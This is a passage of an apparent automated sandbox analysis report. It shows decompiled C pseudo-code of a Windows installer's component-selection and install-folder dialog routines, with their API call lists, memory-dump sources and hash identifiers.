                                                                              				int _t316;
                                                                              				int _t317;
                                                                              				signed int _t318;
                                                                              				void* _t320;
                                                                              
                                                                              				_v12 = GetDlgItem(_a4, 0x3f9);
                                                                              				_t182 = GetDlgItem(_a4, 0x408);
                                                                              				_t280 =  *0x7a2fa8;
                                                                              				_t320 = SendMessageA;
                                                                              				_v8 = _t182;
                                                                              				_t315 = 0;
                                                                              				_v32 = _t280;
                                                                              				_v20 =  *0x7a2f88 + 0x94;
                                                                              				if(_a8 != 0x110) {
                                                                              					L23:
                                                                              					if(_a8 != 0x405) {
                                                                              						_t289 = _a16;
                                                                              					} else {
                                                                              						_a12 = _t315;
                                                                              						_t289 = 1;
                                                                              						_a8 = 0x40f;
                                                                              						_a16 = 1;
                                                                              					}
                                                                              					if(_a8 == 0x4e || _a8 == 0x413) {
                                                                              						_v16 = _t289;
                                                                              						if(_a8 == 0x413 ||  *((intOrPtr*)(_t289 + 4)) == 0x408) {
                                                                              							if(( *0x7a2f91 & 0x00000002) != 0) {
                                                                              								L41:
                                                                              								if(_v16 != _t315) {
                                                                              									_t232 = _v16;
                                                                              									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
                                                                              										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
                                                                              									}
                                                                              									_t233 = _v16;
                                                                              									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
                                                                              										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
                                                                              											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) & 0xffffffdf;
                                                                              										} else {
                                                                              											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
                                                                              										}
                                                                              									}
                                                                              								}
                                                                              								goto L48;
                                                                              							}
                                                                              							if(_a8 == 0x413) {
                                                                              								L33:
                                                                              								_t289 = 0 | _a8 != 0x00000413;
                                                                              								_t240 = E00404627(_v8, _a8 != 0x413);
                                                                              								if(_t240 >= _t315) {
                                                                              									_t93 = _t280 + 8; // 0x8
                                                                              									_t310 = _t240 * 0x418 + _t93;
                                                                              									_t289 =  *_t310;
                                                                              									if((_t289 & 0x00000010) == 0) {
                                                                              										if((_t289 & 0x00000040) == 0) {
                                                                              											_t298 = _t289 ^ 0x00000001;
                                                                              										} else {
                                                                              											_t300 = _t289 ^ 0x00000080;
                                                                              											if(_t300 >= 0) {
                                                                              												_t298 = _t300 & 0xfffffffe;
                                                                              											} else {
                                                                              												_t298 = _t300 | 0x00000001;
                                                                              											}
                                                                              										}
                                                                              										 *_t310 = _t298;
                                                                              										E0040117D(_t240);
                                                                              										_t289 = 1;
                                                                              										_a8 = 0x40f;
                                                                              										_a12 = 1;
                                                                              										_a16 =  !( *0x7a2f90) >> 0x00000008 & 1;
                                                                              									}
                                                                              								}
                                                                              								goto L41;
                                                                              							}
                                                                              							_t289 = _a16;
                                                                              							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                                              								goto L41;
                                                                              							}
                                                                              							goto L33;
                                                                              						} else {
                                                                              							goto L48;
                                                                              						}
                                                                              					} else {
                                                                              						L48:
                                                                              						if(_a8 != 0x111) {
                                                                              							L56:
                                                                              							if(_a8 == 0x200) {
                                                                              								SendMessageA(_v8, 0x200, _t315, _t315);
                                                                              							}
                                                                              							if(_a8 == 0x40b) {
                                                                              								_t220 =  *0x79f564;
                                                                              								if(_t220 != _t315) {
                                                                              									ImageList_Destroy(_t220);
                                                                              								}
                                                                              								_t221 =  *0x79f578;
                                                                              								if(_t221 != _t315) {
                                                                              									GlobalFree(_t221);
                                                                              								}
                                                                              								 *0x79f564 = _t315;
                                                                              								 *0x79f578 = _t315;
                                                                              								 *0x7a2fe0 = _t315;
                                                                              							}
                                                                              							if(_a8 != 0x40f) {
                                                                              								L86:
                                                                              								if(_a8 == 0x420 && ( *0x7a2f91 & 0x00000001) != 0) {
                                                                              									_t316 = (0 | _a16 == 0x00000020) << 3;
                                                                              									ShowWindow(_v8, _t316);
                                                                              									ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
                                                                              								}
                                                                              								goto L89;
                                                                              							} else {
                                                                              								E004011EF(_t289, _t315, _t315);
                                                                              								if(_a12 != _t315) {
                                                                              									E00401410(8);
                                                                              								}
                                                                              								if(_a16 == _t315) {
                                                                              									L73:
                                                                              									E004011EF(_t289, _t315, _t315);
                                                                              									_v32 =  *0x79f578;
                                                                              									_t196 =  *0x7a2fa8;
                                                                              									_v60 = 0xf030;
                                                                              									_v16 = _t315;
                                                                              									if( *0x7a2fac <= _t315) {
                                                                              										L84:
                                                                              										InvalidateRect(_v8, _t315, 1);
                                                                              										if( *((intOrPtr*)( *0x7a275c + 0x10)) != _t315) {
                                                                              											E00404545(0x3ff, 0xfffffffb, E004045FA(5));
                                                                              										}
                                                                              										goto L86;
                                                                              									}
                                                                              									_t281 = _t196 + 8;
                                                                              									do {
                                                                              										_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
                                                                              										if(_t202 != _t315) {
                                                                              											_t291 =  *_t281;
                                                                              											_v68 = _t202;
                                                                              											_v72 = 8;
                                                                              											if((_t291 & 0x00000001) != 0) {
                                                                              												_v72 = 9;
                                                                              												_v56 =  &(_t281[4]);
                                                                              												_t281[0] = _t281[0] & 0x000000fe;
                                                                              											}
                                                                              											if((_t291 & 0x00000040) == 0) {
                                                                              												_t206 = (_t291 & 0x00000001) + 1;
                                                                              												if((_t291 & 0x00000010) != 0) {
                                                                              													_t206 = _t206 + 3;
                                                                              												}
                                                                              											} else {
                                                                              												_t206 = 3;
                                                                              											}
                                                                              											_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
                                                                              											SendMessageA(_v8, 0x1102, (_t291 >> 0x00000005 & 0x00000001) + 1, _v68);
                                                                              											SendMessageA(_v8, 0x110d, _t315,  &_v72);
                                                                              										}
                                                                              										_v16 = _v16 + 1;
                                                                              										_t281 =  &(_t281[0x106]);
                                                                              									} while (_v16 <  *0x7a2fac);
                                                                              									goto L84;
                                                                              								} else {
                                                                              									_t282 = E004012E2( *0x79f578);
                                                                              									E00401299(_t282);
                                                                              									_t217 = 0;
                                                                              									_t289 = 0;
                                                                              									if(_t282 <= _t315) {
                                                                              										L72:
                                                                              										SendMessageA(_v12, 0x14e, _t289, _t315);
                                                                              										_a16 = _t282;
                                                                              										_a8 = 0x420;
                                                                              										goto L73;
                                                                              									} else {
                                                                              										goto L69;
                                                                              									}
                                                                              									do {
                                                                              										L69:
                                                                              										if( *((intOrPtr*)(_v20 + _t217 * 4)) != _t315) {
                                                                              											_t289 = _t289 + 1;
                                                                              										}
                                                                              										_t217 = _t217 + 1;
                                                                              									} while (_t217 < _t282);
                                                                              									goto L72;
                                                                              								}
                                                                              							}
                                                                              						}
                                                                              						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                                              							goto L89;
                                                                              						} else {
                                                                              							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
                                                                              							if(_t227 == 0xffffffff) {
                                                                              								goto L89;
                                                                              							}
                                                                              							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
                                                                              							if(_t283 == 0xffffffff ||  *((intOrPtr*)(_v20 + _t283 * 4)) == _t315) {
                                                                              								_t283 = 0x20;
                                                                              							}
                                                                              							E00401299(_t283);
                                                                              							SendMessageA(_a4, 0x420, _t315, _t283);
                                                                              							_a12 = 1;
                                                                              							_a16 = _t315;
                                                                              							_a8 = 0x40f;
                                                                              							goto L56;
                                                                              						}
                                                                              					}
                                                                              				} else {
                                                                              					 *0x7a2fe0 = _a4;
                                                                              					_t285 = 2;
                                                                              					_v28 = 0;
                                                                              					_v16 = _t285;
                                                                              					 *0x79f578 = GlobalAlloc(0x40,  *0x7a2fac << 2);
                                                                              					_v24 = LoadBitmapA( *0x7a2f80, 0x6e);
                                                                              					 *0x79f574 = SetWindowLongA(_v8, 0xfffffffc, E00404CA1);
                                                                              					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                                                              					 *0x79f564 = _t252;
                                                                              					ImageList_AddMasked(_t252, _v24, 0xff00ff);
                                                                              					SendMessageA(_v8, 0x1109, _t285,  *0x79f564);
                                                                              					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
                                                                              						SendMessageA(_v8, 0x111b, 0x10, 0);
                                                                              					}
                                                                              					DeleteObject(_v24);
                                                                              					_t286 = 0;
                                                                              					do {
                                                                              						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
                                                                              						if(_t258 != _t315) {
                                                                              							if(_t286 != 0x20) {
                                                                              								_v16 = _t315;
                                                                              							}
                                                                              							_push(_t258);
                                                                              							_push(_t315);
                                                                              							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E004059E1(_t286, _t315, _t320)), _t286);
                                                                              						}
                                                                              						_t286 = _t286 + 1;
                                                                              					} while (_t286 < 0x21);
                                                                              					_t317 = _a16;
                                                                              					_t287 = _v16;
                                                                              					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
                                                                              					_push(0x15);
                                                                              					E00403DA7(_a4);
                                                                              					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
                                                                              					_push(0x16);
                                                                              					E00403DA7(_a4);
                                                                              					_t318 = 0;
                                                                              					_t288 = 0;
                                                                              					if( *0x7a2fac <= 0) {
                                                                              						L19:
                                                                              						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
                                                                              						goto L20;
                                                                              					} else {
                                                                              						_t311 = _v32 + 8;
                                                                              						_v24 = _t311;
                                                                              						do {
                                                                              							_t268 = _t311 + 0x10;
                                                                              							if( *_t268 != 0) {
                                                                              								_v60 = _t268;
                                                                              								_t269 =  *_t311;
                                                                              								_t302 = 0x20;
                                                                              								_v84 = _t288;
                                                                              								_v80 = 0xffff0002;
                                                                              								_v76 = 0xd;
                                                                              								_v64 = _t302;
                                                                              								_v40 = _t318;
                                                                              								_v68 = _t269 & _t302;
                                                                              								if((_t269 & 0x00000002) == 0) {
                                                                              									if((_t269 & 0x00000004) == 0) {
                                                                              										 *( *0x79f578 + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
                                                                              									} else {
                                                                              										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
                                                                              									}
                                                                              								} else {
                                                                              									_v76 = 0x4d;
                                                                              									_v44 = 1;
                                                                              									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
                                                                              									_v28 = 1;
                                                                              									 *( *0x79f578 + _t318 * 4) = _t274;
                                                                              									_t288 =  *( *0x79f578 + _t318 * 4);
                                                                              								}
                                                                              							}
                                                                              							_t318 = _t318 + 1;
                                                                              							_t311 = _v24 + 0x418;
                                                                              							_v24 = _t311;
                                                                              						} while (_t318 <  *0x7a2fac);
                                                                              						if(_v28 != 0) {
                                                                              							L20:
                                                                              							if(_v16 != 0) {
                                                                              								E00403DDC(_v8);
                                                                              								_t280 = _v32;
                                                                              								_t315 = 0;
                                                                              								goto L23;
                                                                              							} else {
                                                                              								ShowWindow(_v12, 5);
                                                                              								E00403DDC(_v12);
                                                                              								L89:
                                                                              								return E00403E0E(_a8, _a12, _a16);
                                                                              							}
                                                                              						}
                                                                              						goto L19;
                                                                              					}
                                                                              				}
                                                                              			}
                                                                              0x00000000
                                                                              0x00404b3a
                                                                              0x00404b1d
                                                                              0x00404b01
                                                                              0x00404a3e
                                                                              0x00000000
                                                                              0x00404a54
                                                                              0x00404a5e
                                                                              0x00404a63
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00404a75
                                                                              0x00404a7a
                                                                              0x00404a86
                                                                              0x00404a86
                                                                              0x00404a88
                                                                              0x00404a97
                                                                              0x00404a99
                                                                              0x00404aa0
                                                                              0x00404aa3
                                                                              0x00000000
                                                                              0x00404aa3
                                                                              0x00404a3e
                                                                              0x004046fb
                                                                              0x00404700
                                                                              0x0040470a
                                                                              0x0040470b
                                                                              0x00404714
                                                                              0x0040471f
                                                                              0x0040473a
                                                                              0x0040474c
                                                                              0x00404751
                                                                              0x0040475c
                                                                              0x00404765
                                                                              0x0040477a
                                                                              0x0040478b
                                                                              0x00404798
                                                                              0x00404798
                                                                              0x0040479d
                                                                              0x004047a3
                                                                              0x004047a5
                                                                              0x004047a8
                                                                              0x004047ad
                                                                              0x004047b2
                                                                              0x004047b4
                                                                              0x004047b4
                                                                              0x004047b7
                                                                              0x004047b8
                                                                              0x004047d4
                                                                              0x004047d4
                                                                              0x004047d6
                                                                              0x004047d7
                                                                              0x004047dc
                                                                              0x004047df
                                                                              0x004047e2
                                                                              0x004047e6
                                                                              0x004047eb
                                                                              0x004047f0
                                                                              0x004047f4
                                                                              0x004047f9
                                                                              0x004047fe
                                                                              0x00404800
                                                                              0x00404808
                                                                              0x004048d2
                                                                              0x004048e5
                                                                              0x00000000
                                                                              0x0040480e
                                                                              0x00404811
                                                                              0x00404814
                                                                              0x00404817
                                                                              0x00404817
                                                                              0x0040481d
                                                                              0x00404823
                                                                              0x00404826
                                                                              0x0040482c
                                                                              0x0040482d
                                                                              0x00404832
                                                                              0x0040483b
                                                                              0x00404842
                                                                              0x00404845
                                                                              0x00404848
                                                                              0x0040484b
                                                                              0x00404887
                                                                              0x004048b0
                                                                              0x00404889
                                                                              0x00404896
                                                                              0x00404896
                                                                              0x0040484d
                                                                              0x00404850
                                                                              0x0040485f
                                                                              0x00404869
                                                                              0x00404871
                                                                              0x00404878
                                                                              0x00404880
                                                                              0x00404880
                                                                              0x0040484b
                                                                              0x004048b6
                                                                              0x004048b7
                                                                              0x004048c3
                                                                              0x004048c3
                                                                              0x004048d0
                                                                              0x004048eb
                                                                              0x004048ef
                                                                              0x0040490c
                                                                              0x00404911
                                                                              0x00404914
                                                                              0x00000000
                                                                              0x004048f1
                                                                              0x004048f6
                                                                              0x004048ff
                                                                              0x00404c8c
                                                                              0x00404c9e
                                                                              0x00404c9e
                                                                              0x004048ef
                                                                              0x00000000
                                                                              0x004048d0
                                                                              0x00404808

                                                                              APIs
                                                                              • GetDlgItem.USER32 ref: 004046BE
                                                                              • GetDlgItem.USER32 ref: 004046CB
                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404717
                                                                              • LoadBitmapA.USER32 ref: 0040472A
                                                                              • SetWindowLongA.USER32 ref: 0040473D
                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404751
                                                                              • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404765
                                                                              • SendMessageA.USER32(?,00001109,00000002), ref: 0040477A
                                                                              • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404786
                                                                              • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404798
                                                                              • DeleteObject.GDI32(?), ref: 0040479D
                                                                              • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004047C8
                                                                              • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004047D4
                                                                              • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404869
                                                                              • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404894
                                                                              • SendMessageA.USER32(?,00001100,00000000,?), ref: 004048A8
                                                                              • GetWindowLongA.USER32 ref: 004048D7
                                                                              • SetWindowLongA.USER32 ref: 004048E5
                                                                              • ShowWindow.USER32(?,00000005), ref: 004048F6
                                                                              • SendMessageA.USER32(?,00000419,00000000,?), ref: 004049F9
                                                                              • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404A5E
                                                                              • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404A73
                                                                              • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404A97
                                                                              • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404ABD
                                                                              • ImageList_Destroy.COMCTL32(?), ref: 00404AD2
                                                                              • GlobalFree.KERNEL32 ref: 00404AE2
                                                                              • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404B52
                                                                              • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404BFB
                                                                              • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404C0A
                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00404C2A
                                                                              • ShowWindow.USER32(?,00000000), ref: 00404C78
                                                                              • GetDlgItem.USER32 ref: 00404C83
                                                                              • ShowWindow.USER32(00000000), ref: 00404C8A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp
                                                                              Similarity
                                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                              • String ID: $M$N
                                                                              • API String ID: 1638840714-813528018
                                                                              • Opcode ID: f88003ccba9f0ad4292bbb639cf8dfb56ca7ece40271dea942f8be45a3b21ba3
                                                                              • Instruction ID: 9804f70a80ad740571f010f4d41a056d70bc73ca34169b501aedef0055c070ba
                                                                              • Opcode Fuzzy Hash: f88003ccba9f0ad4292bbb639cf8dfb56ca7ece40271dea942f8be45a3b21ba3
                                                                              • Instruction Fuzzy Hash: 3C029EB0D00208EFEB10DF64CD45AAE7BB5EB84315F10817AF610BA2E1C7799A52CF58
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 68%
                                                                              			E004041E5(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                                              				int _v8;
                                                                              				signed int _v12;
                                                                              				long _v16;
                                                                              				long _v20;
                                                                              				char _v24;
                                                                              				long _v28;
                                                                              				char _v32;
                                                                              				intOrPtr _v36;
                                                                              				long _v40;
                                                                              				signed int _v44;
                                                                              				CHAR* _v52;
                                                                              				intOrPtr _v56;
                                                                              				intOrPtr _v60;
                                                                              				intOrPtr _v64;
                                                                              				CHAR* _v68;
                                                                              				void _v72;
                                                                              				char _v76;
                                                                              				void* __ebx;
                                                                              				void* __edi;
                                                                              				void* __esi;
                                                                              				intOrPtr _t75;
                                                                              				signed char* _t80;
                                                                              				intOrPtr* _t81;
                                                                              				int _t86;
                                                                              				int _t88;
                                                                              				int _t100;
                                                                              				signed int _t105;
                                                                              				char* _t110;
                                                                              				intOrPtr _t114;
                                                                              				intOrPtr* _t128;
                                                                              				signed int _t140;
                                                                              				signed int _t145;
                                                                              				CHAR* _t151;
                                                                              
                                                                              				_t75 =  *0x79ed58;
                                                                              				_v36 = _t75;
                                                                              				_t151 = ( *(_t75 + 0x3c) << 0xa) + 0x7a4000;
                                                                              				_v12 =  *((intOrPtr*)(_t75 + 0x38));
                                                                              				if(_a8 == 0x40b) {
                                                                              					E004052A3(0x3fb, _t151);
                                                                              					E00405BFB(_t151);
                                                                              				}
                                                                              				if(_a8 != 0x110) {
                                                                              					L8:
                                                                              					if(_a8 != 0x111) {
                                                                              						L19:
                                                                              						if(_a8 == 0x40f) {
                                                                              							L21:
                                                                              							_v8 = _v8 & 0x00000000;
                                                                              							_v12 = _v12 & 0x00000000;
                                                                              							_t145 = _t144 | 0xffffffff;
                                                                              							E004052A3(0x3fb, _t151);
                                                                              							if(E004055AC(_t169, _t151) == 0) {
                                                                              								_v8 = 1;
                                                                              							}
                                                                              							E004059BF(0x79e550, _t151);
                                                                              							_t80 = E0040555F(0x79e550);
                                                                              							if(_t80 != 0) {
                                                                              								 *_t80 =  *_t80 & 0x00000000;
                                                                              							}
                                                                              							_t81 = E00405CD2("KERNEL32.dll", "GetDiskFreeSpaceExA");
                                                                              							if(_t81 == 0) {
                                                                              								L28:
                                                                              								_t86 = GetDiskFreeSpaceA(0x79e550,  &_v20,  &_v28,  &_v16,  &_v40);
                                                                              								__eflags = _t86;
                                                                              								if(_t86 == 0) {
                                                                              									goto L31;
                                                                              								}
                                                                              								_t100 = _v20 * _v28;
                                                                              								__eflags = _t100;
                                                                              								_t145 = MulDiv(_t100, _v16, 0x400);
                                                                              								goto L30;
                                                                              							} else {
                                                                              								_push( &_v32);
                                                                              								_push( &_v24);
                                                                              								_push( &_v44);
                                                                              								_push(0x79e550);
                                                                              								if( *_t81() == 0) {
                                                                              									goto L28;
                                                                              								}
                                                                              								_t145 = (_v40 << 0x00000020 | _v44) >> 0xa;
                                                                              								L30:
                                                                              								_v12 = 1;
                                                                              								L31:
                                                                              								if(_t145 < E004045FA(5)) {
                                                                              									_v8 = 2;
                                                                              								}
                                                                              								if( *((intOrPtr*)( *0x7a275c + 0x10)) != 0) {
                                                                              									E00404545(0x3ff, 0xfffffffb, _t87);
                                                                              									if(_v12 == 0) {
                                                                              										SetDlgItemTextA(_a4, 0x400, 0x79e540);
                                                                              									} else {
                                                                              										E00404545(0x400, 0xfffffffc, _t145);
                                                                              									}
                                                                              								}
                                                                              								_t88 = _v8;
                                                                              								 *0x7a3024 = _t88;
                                                                              								if(_t88 == 0) {
                                                                              									_v8 = E00401410(7);
                                                                              								}
                                                                              								if(( *(_v36 + 0x14) & 0x00000400) != 0) {
                                                                              									_v8 = 0;
                                                                              								}
                                                                              								E00403DC9(0 | _v8 == 0x00000000);
                                                                              								if(_v8 == 0 &&  *0x79f570 == 0) {
                                                                              									E0040417A();
                                                                              								}
                                                                              								 *0x79f570 = 0;
                                                                              								goto L45;
                                                                              							}
                                                                              						}
                                                                              						_t169 = _a8 - 0x405;
                                                                              						if(_a8 != 0x405) {
                                                                              							goto L45;
                                                                              						}
                                                                              						goto L21;
                                                                              					}
                                                                              					_t105 = _a12 & 0x0000ffff;
                                                                              					if(_t105 != 0x3fb) {
                                                                              						L12:
                                                                              						if(_t105 == 0x3e9) {
                                                                              							_t140 = 7;
                                                                              							memset( &_v72, 0, _t140 << 2);
                                                                              							_t144 = 0x79f580;
                                                                              							_v76 = _a4;
                                                                              							_v68 = 0x79f580;
                                                                              							_v56 = E004044DF;
                                                                              							_v52 = _t151;
                                                                              							_v64 = E004059E1(0x3fb, 0x79f580, _t151);
                                                                              							_t110 =  &_v76;
                                                                              							_v60 = 0x41;
                                                                              							__imp__SHBrowseForFolderA(_t110, 0x79e958, _v12);
                                                                              							if(_t110 == 0) {
                                                                              								_a8 = 0x40f;
                                                                              							} else {
                                                                              								E0040521C(0, _t110);
                                                                              								E004054CC(_t151);
                                                                              								_t114 =  *((intOrPtr*)( *0x7a2f88 + 0x11c));
                                                                              								if(_t114 != 0) {
                                                                              									_push(_t114);
                                                                              									_push(0);
                                                                              									E004059E1(0x3fb, 0x79f580, _t151);
                                                                              									_t144 = 0x7a1f20;
                                                                              									if(lstrcmpiA(0x7a1f20, 0x79f580) != 0) {
                                                                              										lstrcatA(_t151, 0x7a1f20);
                                                                              									}
                                                                              								}
                                                                              								 *0x79f570 =  *0x79f570 + 1;
                                                                              								SetDlgItemTextA(_a4, 0x3fb, _t151);
                                                                              							}
                                                                              						}
                                                                              						goto L19;
                                                                              					}
                                                                              					if(_a12 >> 0x10 != 0x300) {
                                                                              						goto L45;
                                                                              					}
                                                                              					_a8 = 0x40f;
                                                                              					goto L12;
                                                                              				} else {
                                                                              					_t144 = GetDlgItem(_a4, 0x3fb);
                                                                              					if(E00405538(_t151) != 0 && E0040555F(_t151) == 0) {
                                                                              						E004054CC(_t151);
                                                                              					}
                                                                              					 *0x7a2758 = _a4;
                                                                              					SetWindowTextA(_t144, _t151);
                                                                              					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                                              					_push(1);
                                                                              					E00403DA7(_a4);
                                                                              					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                              					_push(0x14);
                                                                              					E00403DA7(_a4);
                                                                              					E00403DDC(_t144);
                                                                              					_t128 = E00405CD2("shlwapi.dll", "SHAutoComplete");
                                                                              					if(_t128 == 0) {
                                                                              						L45:
                                                                              						return E00403E0E(_a8, _a12, _a16);
                                                                              					}
                                                                              					 *_t128(_t144, 1);
                                                                              					goto L8;
                                                                              				}
                                                                              			}
                                                                              0x004041eb
                                                                              0x004041f2
                                                                              0x004041fe
                                                                              0x0040420c
                                                                              0x00404214
                                                                              0x00404218
                                                                              0x0040421e
                                                                              0x0040421e
                                                                              0x0040422a
                                                                              0x004042a4
                                                                              0x004042ab
                                                                              0x00404377
                                                                              0x0040437e
                                                                              0x0040438d
                                                                              0x0040438d
                                                                              0x00404391
                                                                              0x00404397
                                                                              0x0040439a
                                                                              0x004043a7
                                                                              0x004043a9
                                                                              0x004043a9
                                                                              0x004043b7
                                                                              0x004043bd
                                                                              0x004043c4
                                                                              0x004043c6
                                                                              0x004043c6
                                                                              0x004043d3
                                                                              0x004043df
                                                                              0x00404403
                                                                              0x00404414
                                                                              0x0040441a
                                                                              0x0040441c
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00404422
                                                                              0x00404422
                                                                              0x00404430
                                                                              0x00000000
                                                                              0x004043e1
                                                                              0x004043e4
                                                                              0x004043e8
                                                                              0x004043ec
                                                                              0x004043ed
                                                                              0x004043f2
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004043fa
                                                                              0x00404432
                                                                              0x00404432
                                                                              0x00404439
                                                                              0x00404442
                                                                              0x00404444
                                                                              0x00404444
                                                                              0x00404456
                                                                              0x00404460
                                                                              0x00404468
                                                                              0x0040447e
                                                                              0x0040446a
                                                                              0x0040446e
                                                                              0x0040446e
                                                                              0x00404468
                                                                              0x00404483
                                                                              0x00404488
                                                                              0x0040448d
                                                                              0x00404496
                                                                              0x00404496
                                                                              0x0040449f
                                                                              0x004044a1
                                                                              0x004044a1
                                                                              0x004044ad
                                                                              0x004044b5
                                                                              0x004044bf
                                                                              0x004044bf
                                                                              0x004044c4
                                                                              0x00000000
                                                                              0x004044c4
                                                                              0x004043df
                                                                              0x00404380
                                                                              0x00404387
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00404387
                                                                              0x004042b1
                                                                              0x004042b7
                                                                              0x004042d1
                                                                              0x004042d6
                                                                              0x004042e0
                                                                              0x004042e7
                                                                              0x004042ec
                                                                              0x004042f6
                                                                              0x004042f9
                                                                              0x004042fc
                                                                              0x00404303
                                                                              0x0040430b
                                                                              0x0040430e
                                                                              0x00404312
                                                                              0x00404319
                                                                              0x00404321
                                                                              0x00404370
                                                                              0x00404323
                                                                              0x00404324
                                                                              0x0040432a
                                                                              0x00404334
                                                                              0x0040433c
                                                                              0x0040433e
                                                                              0x0040433f
                                                                              0x00404341
                                                                              0x00404347
                                                                              0x00404355
                                                                              0x00404359
                                                                              0x00404359
                                                                              0x00404355
                                                                              0x0040435e
                                                                              0x00404369
                                                                              0x00404369
                                                                              0x00404321
                                                                              0x00000000
                                                                              0x004042d6
                                                                              0x004042c4
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004042ca
                                                                              0x00000000
                                                                              0x0040422c
                                                                              0x00404237
                                                                              0x00404240
                                                                              0x0040424d
                                                                              0x0040424d
                                                                              0x00404257
                                                                              0x0040425c
                                                                              0x00404265
                                                                              0x00404268
                                                                              0x0040426d
                                                                              0x00404275
                                                                              0x00404278
                                                                              0x0040427d
                                                                              0x00404283
                                                                              0x00404292
                                                                              0x00404299
                                                                              0x004044ca
                                                                              0x004044dc
                                                                              0x004044dc
                                                                              0x004042a2
                                                                              0x00000000
                                                                              0x004042a2

                                                                              APIs
                                                                              • GetDlgItem.USER32 ref: 00404230
                                                                              • SetWindowTextA.USER32(00000000,?), ref: 0040425C
                                                                              • SHBrowseForFolderA.SHELL32(?,0079E958,?), ref: 00404319
                                                                              • lstrcmpiA.KERNEL32(007A1F20,0079F580,00000000,?,?,00000000), ref: 0040434D
                                                                              • lstrcatA.KERNEL32(?,007A1F20), ref: 00404359
                                                                              • SetDlgItemTextA.USER32 ref: 00404369
                                                                                • Part of subcall function 004052A3: GetDlgItemTextA.USER32 ref: 004052B6
                                                                                • Part of subcall function 00405BFB: CharNextA.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C53
                                                                                • Part of subcall function 00405BFB: CharNextA.USER32(?,?,?,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C60
                                                                                • Part of subcall function 00405BFB: CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C65
